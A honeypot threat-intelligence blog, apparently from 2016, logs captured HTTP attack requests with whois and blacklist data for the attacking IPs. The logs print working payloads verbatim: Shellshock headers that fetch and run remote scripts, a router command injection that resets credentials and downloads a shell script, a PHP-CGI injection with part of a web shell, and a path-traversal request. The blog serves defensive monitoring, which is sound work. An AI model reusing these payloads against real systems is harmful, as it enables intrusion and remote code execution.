Freitag, 4. März 2016

end of life

Good morning,

as you may have already found out, the posts on this blog have been getting less and less. This is caused by the fact that my two honeypots have had some issues.

The vservers will be going down soon. So no more analytics.

Thanks to Swen for having the Germany running for so long. I am currently looking for cheap vservers in the world and talks to some people about funding the operation costs, until than....

This is the end

Donnerstag, 11. Februar 2016

159.226.162.196 - #perl wget via 204.232.209.188

BEGIN OF HTTP DATA:
2016-02-11 19:15:33
Source IP: 159.226.162.196
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  ");'
Host: 109.234.106.8
Connection: Close


 END OF DATA

The http server returned 404 at the time of the investigation


Copyright (c) 2015,2016, Joerg Stephan
All rights reserved.

Disclaimer:This information is provided as-is and there is no guarantee
that blocking an IP or domain reported in this overview will not adversely
impact your business. Use all information provided on your own risk,
the author disclaims all warranty and shall not be liable for any damage
or impact caused.

159.226.162[.]196

    Whois Data (TeamCymru)
  • AS : 7497
  • IP : 159.226.162.196
  • BGP Prefix : 159.226.162.0/24
  • CC : CN
  • Registry : apnic
  • Allocated :
  • AS Name: CSTNET-AS-AP Computer Network Information Center,CN
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

204.232.209[.]188

    Whois Data (TeamCymru)
  • AS : 33070
  • IP : 204.232.209.188
  • BGP Prefix : 204.232.192.0/19
  • CC : US
  • Registry : arin
  • Allocated : 2009-06-24
  • AS Name: RMH-14 - Rackspace Hosting,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 213.136.72.84 . shellshock perl via 204.232.209.188
  • Reference: http://sendmespamids.blogspot.com/2016/01/2131367284-shellshock-perl-via.html
  • In db since: 2016-01-22 08:36:12.295000

Sonntag, 7. Februar 2016

178.57.115.231 - (Russian IPs) possible DD-WRT firmware via 178.57.115.231:8081

BEGIN OF HTTP DATA:
2016-02-06 15:33:59
Source IP: 178.57.115.231
GET /cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;nvram$IFS\commit;sleep$IFS ;cd$IFS\/tmp;wget$IFS\http:\/\/178.57.115.231:8081\/h\/wrt\/ug.sh;chmod$IFSÿ$IFS\/tmp/ug.sh;/bin/sh$IFS\/tmp/ug.sh HTTP/1.0
Host:195.169.125.87:8080

 END OF DATA

The ug.sh tries to download an binary file





 Just by taking a look of the xxd and strings output of the file, it looks like an DD-WRT firmware file.


Copyright (c) 2015,2016, Joerg Stephan
All rights reserved.

Disclaimer:This information is provided as-is and there is no guarantee
that blocking an IP or domain reported in this overview will not adversely
impact your business. Use all information provided on your own risk,
the author disclaims all warranty and shall not be liable for any damage
or impact caused.

178.57.115[.]231

    Whois Data (TeamCymru)
  • AS : 60139
  • IP : 178.57.115.231
  • BGP Prefix : 178.57.112.0/21
  • CC : RU
  • Registry : ripencc
  • Allocated : 2010-02-02
  • AS Name: Z-TELECOM Z-Telecom Ltd,RU
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

178.57.115[.]231

    Whois Data (TeamCymru)
  • AS : 60139
  • IP : 178.57.115.231
  • BGP Prefix : 178.57.112.0/21
  • CC : RU
  • Registry : ripencc
  • Allocated : 2010-02-02
  • AS Name: Z-TELECOM Z-Telecom Ltd,RU
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

Sonntag, 24. Januar 2016

61.49.45.47 - WhatWeb/0.4.8-dev (first time seen)

BEGIN OF HTTP DATA:
2016-01-23 16:47:13
Source IP: 61.49.45.47
GET / HTTP/1.1
User-Agent: WhatWeb/0.4.8-dev
Host: 109.234.106.8:8080
Connection: close
Accept: */*
 For more information https://user-agents.me/crawler/whatweb048-dev
According to some news in the web, this crawler is meant to identify the running webpages on a server.

61.49.45[.]47

    Whois Data (TeamCymru)
  • AS : 4808
  • IP : 61.49.45.47
  • BGP Prefix : 61.49.0.0/18
  • CC : CN
  • Registry : apnic
  • Allocated : 2001-06-28
  • AS Name: CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network,CN
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/61.49.45.47

Donnerstag, 21. Januar 2016

213.136.72.84 . Shellshock perl via 204.232.209.188

BEGIN OF HTTP DATA:
2016-01-20 09:58:59
Source IP: 213.136.72.84
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  ");'
Host: 195.169.125.87
Connection: Close


 END OF DATA

213.136.72[.]84

    Whois Data (TeamCymru)
  • AS : 51167
  • IP : 213.136.72.84
  • BGP Prefix : 213.136.72.0/23
  • CC : DE
  • Registry : ripencc
  • Allocated : 2000-02-28
  • AS Name: CONTABO Contabo GmbH,DE
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/213.136.72.84
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/213.136.72.84

204.232.209[.]188

    Whois Data (TeamCymru)
  • AS : 33070
  • IP : 204.232.209.188
  • BGP Prefix : 204.232.192.0/19
  • CC : US
  • Registry : arin
  • Allocated : 2009-06-24
  • AS Name: RMH-14 - Rackspace Hosting,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

92.45.197.218 - Zollard php execution

BEGIN OF HTTP DATA:
2016-01-21 09:47:25
Source IP: 92.45.197.218
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F
%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%6
9%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%
66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63
%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1817
Connection: close

<?php
echo "Zollard";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
 $disablefunc = str_replace(" ","",$disablefunc);
 $disablefunc = explode(",",$disablefunc);
}
function myshellexec($cmd)
{
 global $disablefunc;
 $result = "";
 if (!empty($cmd))
 {
  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== FALSE) {}
  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru") and !in_array("passthru",$disabl

END OF DATA
Sadly the request was to long to be fully logged by the fake HTTP server

The POST messages is
POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n HTTP/1.1

92.45.197[.]218

    Whois Data (TeamCymru)
  • AS : 34984
  • IP : 92.45.197.218
  • BGP Prefix : 92.45.196.0/23
  • CC : TR
  • Registry : ripencc
  • Allocated : 2007-12-17
  • AS Name: TELLCOM-AS TELLCOM ILETISIM HIZMETLERI A.S.,TR
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

 

Mittwoch, 13. Januar 2016

Scanner seen on January 14, 2016

  • 185.130.5.207 - muieblackcat
  • 37.142.32.222 - masscan/1.0
  • 149.78.19.136 -  masscan/1.0
  • 195.169.125.87 -  zgrab/0.x 
  • 185.130.5.235 -  muieblackcat

185.130.5[.]207

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.207
  • BGP Prefix : 185.130.5.0/24
  • CC : LT
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.207
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.207
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

37.142.32[.]222

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 37.142.32.222
  • BGP Prefix : 37.142.32.0/22
  • CC : IL
  • Registry : ripencc
  • Allocated : 2012-02-29
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/37.142.32.222

149.78.19[.]136

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 149.78.19.136
  • BGP Prefix : 149.78.0.0/19
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/149.78.19.136
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/149.78.19.136
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

195.169.125[.]87

    Whois Data (TeamCymru)
  • AS : 1103
  • IP : 195.169.125.87
  • BGP Prefix : 195.169.125.0/24
  • CC : NL
  • Registry : ripencc
  • Allocated :
  • AS Name: SURFNET-NL SURFnet, The Netherlands,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 50.118.172.34 / 195.169.125.87 - http javascript/html submission
  • Reference: http://sendmespamids.blogspot.com/2015/09/5011817234-http-javascripthtml.html
  • In db since: 2015-09-24 08:17:16.658000
    Source: Local Feed Database
  • Title: 46.172.71.251, 195.169.125.87 - to ping 212.47.238.143
  • Reference: http://sendmespamids.blogspot.com/2016/01/4617271251-19516912587-to-ping.html
  • In db since: 2016-01-09 11:54:24.541062

185.130.5[.]235

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.235
  • BGP Prefix : 185.130.5.0/24
  • CC : LT
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.235
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.235
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt

83.54.165.57 - Shellshock wget via http://192.192.78.216:9090

BEGIN OF HTTP DATA:
2016-01-13 08:48:44
Source IP: 83.54.165.57
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php -O /tmp/S0.sh  && /bin/sh /tmp/S0.sh 0<&1 2>&1

83.54.165[.]57

    Whois Data (TeamCymru)
  • AS : 3352
  • IP : 83.54.165.57
  • BGP Prefix : 83.54.0.0/16
  • CC : ES
  • Registry : ripencc
  • Allocated : 2004-10-07
  • AS Name: TELEFONICA_DE_ESPANA TELEFONICA DE ESPANA,ES
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/83.54.165.57

192.192.78[.]216

    Whois Data (TeamCymru)
  • AS : 1659
  • IP : 192.192.78.216
  • BGP Prefix : 192.192.0.0/16
  • CC : TW
  • Registry : apnic
  • Allocated :
  • AS Name: ERX-TANET-ASN1 Taiwan Academic Network (TANet) Information Center,TW
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois



 

Dienstag, 12. Januar 2016

Scanner seen on January 11,12 2016

  • 208.100.26.231 - Nmap Scripting Engine
  • 141.212.122.81 -  zgrab/0.x
  • 141.212.122.145 -  zgrab/0.x

208.100.26[.]231

    Whois Data (TeamCymru)
  • AS : 32748
  • IP : 208.100.26.231
  • BGP Prefix : 208.100.0.0/18
  • CC : US
  • Registry : arin
  • Allocated : 2006-02-17
  • AS Name: STEADFAST - Steadfast Networks,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/208.100.26.231
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt
    Source: Local Feed Database
  • Title: 208.100.26.231 - fire on port 8080
  • Reference: http://sendmespamids.blogspot.com/2015/09/20810026231-fire-on-port-8080.html
  • In db since: 2015-09-24 08:17:16.658000
    Source: Local Feed Database
  • Title: 208.100.26.231 - mongodb scanning ip
  • Reference: http://sendmespamids.blogspot.com/2015/10/20810026231-mongodb-scanning-ip.html
  • In db since: 2015-10-11 10:10:48.742000

141.212.122[.]81

    Whois Data (TeamCymru)
  • AS : 36375
  • IP : 141.212.122.81
  • BGP Prefix : 141.212.0.0/16
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: UMICH-AS-5 - University of Michigan,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/141.212.122.81

141.212.122[.]145

    Whois Data (TeamCymru)
  • AS : 36375
  • IP : 141.212.122.145
  • BGP Prefix : 141.212.0.0/16
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: UMICH-AS-5 - University of Michigan,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/141.212.122.145
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Samstag, 9. Januar 2016

85.73.42.84 - wget via http://lliillii.altervista.org/io.php

BEGIN OF HTTP DATA:
2016-01-08 10:07:22
Source IP: 85.73.42.84
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://lliillii.altervista.org/io.php 0<&1 2>&1

85.73.42[.]84

    Whois Data (TeamCymru)
  • AS : 6799
  • IP : 85.73.42.84
  • BGP Prefix : 85.73.0.0/16
  • CC : GR
  • Registry : ripencc
  • Allocated : 2006-05-17
  • AS Name: OTENET-GR Ote SA (Hellenic Telecommunications Organisation),GR
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

Scanner seen on January 9, 2016

  • 93.174.93.203 - masscan/1.0
  • 141.212.122.145 - zgrab/0.x
  • 69.30.217.226 - muieblackcat

93.174.93[.]203

    Whois Data (TeamCymru)
  • AS : 29073
  • IP : 93.174.93.203
  • BGP Prefix : 93.174.88.0/21
  • CC : NL
  • Registry : ripencc
  • Allocated : 2008-06-20
  • AS Name: ECATEL-AS Quasi Networks LTD.,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/93.174.93.203
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/93.174.93.203
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

141.212.122[.]145

    Whois Data (TeamCymru)
  • AS : 36375
  • IP : 141.212.122.145
  • BGP Prefix : 141.212.0.0/16
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: UMICH-AS-5 - University of Michigan,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/141.212.122.145
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/141.212.122.145
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

69.30.217[.]226

    Whois Data (TeamCymru)
  • AS : 32097
  • IP : 69.30.217.226
  • BGP Prefix : 69.30.192.0/18
  • CC : US
  • Registry : arin
  • Allocated : 2004-03-16
  • AS Name: WII-KC - WholeSale Internet, Inc.,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/69.30.217.226

Donnerstag, 7. Januar 2016

84.246.228.80 - access cnf/db.php

BEGIN OF HTTP DATA:
2016-01-07 21:11:32
Source IP: 84.246.228.80
GET /etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php HTTP/1.1
User-Agent: HTTP_Request2/2.2.1 (http://pear.php.net/package/http_request2) PHP/5.3.3
Host: 109.234.106.8
Accept-Encoding: gzip, deflate


84.246.228[.]80

    Whois Data (TeamCymru)
  • AS : 34274
  • IP : 84.246.228.80
  • BGP Prefix : 84.246.224.0/21
  • CC : FR
  • Registry : ripencc
  • Allocated : 2004-10-25
  • AS Name: ELBMULTIMEDIA ELB MULTIMEDIA,FR
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

Scanner seen on January 8, 2016

  • 185.130.5.207 - muieblackcat
  • 141.212.122.64 - zgrab/0.x
  • 5.28.172.193 - masscan/1.0

185.130.5[.]207

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.207
  • BGP Prefix : 185.130.5.0/24
  • CC : LT
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.207
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.207
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

141.212.122[.]64

    Whois Data (TeamCymru)
  • AS : 36375
  • IP : 141.212.122.64
  • BGP Prefix : 141.212.0.0/16
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: UMICH-AS-5 - University of Michigan,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 8.6
  • Reference: https://exchange.xforce.ibmcloud.com/ip/141.212.122.64
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/141.212.122.64
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

5.28.172[.]193

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 5.28.172.193
  • BGP Prefix : 5.28.160.0/20
  • CC : IL
  • Registry : ripencc
  • Allocated : 2012-05-08
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/5.28.172.193

Mittwoch, 6. Januar 2016

Scanner seen on January, 7 2016

  • 149.78.19.136 - masscan/1.0
  • 213.57.67.192 - masscan/1.0
  • 94.102.48.195 - masscan/1.0
  • 195.169.125.87 - zgrab/0.x
  • 85.25.217.27 -  muieblackcat

149.78.19[.]136

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 149.78.19.136
  • BGP Prefix : 149.78.0.0/19
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/149.78.19.136
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/149.78.19.136

213.57.67[.]192

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 213.57.67.192
  • BGP Prefix : 213.57.67.0/24
  • CC : IL
  • Registry : ripencc
  • Allocated :
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

94.102.48[.]195

    Whois Data (TeamCymru)
  • AS : 29073
  • IP : 94.102.48.195
  • BGP Prefix : 94.102.48.0/20
  • CC : NL
  • Registry : ripencc
  • Allocated : 2008-08-29
  • AS Name: ECATEL-AS Quasi Networks LTD.,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/94.102.48.195
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/94.102.48.195
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

195.169.125[.]87

    Whois Data (TeamCymru)
  • AS : 1103
  • IP : 195.169.125.87
  • BGP Prefix : 195.169.125.0/24
  • CC : NL
  • Registry : ripencc
  • Allocated :
  • AS Name: SURFNET-NL SURFnet, The Netherlands,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 50.118.172.34 / 195.169.125.87 - http javascript/html submission
  • Reference: http://sendmespamids.blogspot.com/2015/09/5011817234-http-javascripthtml.html
  • In db since: 2015-09-24 08:17:16.658000

85.25.217[.]27

    Whois Data (TeamCymru)
  • AS : 8972
  • IP : 85.25.217.27
  • BGP Prefix : 85.25.217.0/24
  • CC : DE
  • Registry : ripencc
  • Allocated : 2005-12-05
  • AS Name: PLUSSERVER-AS PlusServer AG,DE
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 7.1
  • Reference: https://exchange.xforce.ibmcloud.com/ip/85.25.217.27
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/85.25.217.27

Dienstag, 5. Januar 2016

46.172.71.251, 195.169.125.87 - to ping 212.47.238.143

BEGIN OF HTTP DATA:
2016-01-05 21:01:11
Source IP: 46.172.71.251 (2nd: 195.169.125.87)
GET /rom-0 HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"
Connection: close


 END OF DATA

212.47.238[.]143

    Whois Data (TeamCymru)
  • AS : 12876
  • IP : 212.47.238.143
  • BGP Prefix : 212.47.224.0/19
  • CC : FR
  • Registry : ripencc
  • Allocated :
  • AS Name: AS12876 ONLINE S.A.S.,FR
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 185.93.185.47 - shellsock ping to 212.47.238.143
  • Reference: http://sendmespamids.blogspot.com/2015/10/1859318547-shellsock-ping-to-21247238143.html
  • In db since: 2015-11-05 09:22:48.499000

46.172.71[.]251

    Whois Data (TeamCymru)
  • AS : 43110
  • IP : 46.172.71.251
  • BGP Prefix : 46.172.64.0/19
  • CC : UA
  • Registry : ripencc
  • Allocated : 2010-12-06
  • AS Name: ROSTNET-AS Joint Ukrainian-American enterprise Ewropol with legal form Ltd,UA
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/46.172.71.251
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/46.172.71.251
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt
    Source: Local Feed Database
  • Title: 46.172.71.251 - simple bash injection
  • Reference: http://sendmespamids.blogspot.com/2015/09/4617271251-simple-bash-injection.html
  • In db since: 2015-09-24 08:17:16.658000

195.169.125[.]87

    Whois Data (TeamCymru)
  • AS : 1103
  • IP : 195.169.125.87
  • BGP Prefix : 195.169.125.0/24
  • CC : NL
  • Registry : ripencc
  • Allocated :
  • AS Name: SURFNET-NL SURFnet, The Netherlands,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 50.118.172.34 / 195.169.125.87 - http javascript/html submission
  • Reference: http://sendmespamids.blogspot.com/2015/09/5011817234-http-javascripthtml.html
  • In db since: 2015-09-24 08:17:16.658000

Montag, 4. Januar 2016

Scanner seen on January 05, 2016

  • 118.98.104[.]21 - Morfeus Fucking Scanner
  • 89.248.168[.]139 - masscan/1.0
  • 5.28.182[.]161 - masscan/1.0
  • 93.174.93[.]203 - masscan/1.0

118.98.104[.]21

    Whois Data (TeamCymru)
  • AS : 17974
  • IP : 118.98.104.21
  • BGP Prefix : 118.98.104.0/24
  • CC : ID
  • Registry : apnic
  • Allocated : 2007-08-24
  • AS Name: TELKOMNET-AS2-AP PT Telekomunikasi Indonesia,ID
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/118.98.104.21
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

89.248.168[.]139

    Whois Data (TeamCymru)
  • AS : 29073
  • IP : 89.248.168.139
  • BGP Prefix : 89.248.168.0/24
  • CC : NL
  • Registry : ripencc
  • Allocated : 2006-07-11
  • AS Name: ECATEL-AS Quasi Networks LTD.,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/89.248.168.139
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/89.248.168.139

5.28.182[.]161

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 5.28.182.161
  • BGP Prefix : 5.28.176.0/21
  • CC : IL
  • Registry : ripencc
  • Allocated : 2012-05-08
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
